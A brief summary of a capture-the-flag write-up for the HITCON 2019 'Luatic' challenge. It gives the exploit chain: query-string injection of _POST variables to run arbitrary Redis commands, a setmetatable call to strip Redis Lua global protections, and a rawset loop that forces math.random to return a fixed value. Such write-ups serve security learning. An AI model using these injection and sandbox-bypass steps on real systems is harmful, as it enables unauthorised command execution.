Rating: 5.0

Execute arbitrary redis commands using `_POST[MY_SET_COMMAND]=<command>&_POST[TEST_KEY]=<arg1>&_POST[TEST_VALUE]=<arg2>` in the query string. Use `setmetatable(_G, nil)` to circumvent global protections in redis and finally redefine `math.random` using `for k, v in pairs(math) do rawset(math, k, function() return 4 end) end`.

Original writeup (https://smyghalloumi.se/posts/2019-10-14-hitcon2019-luatic.html).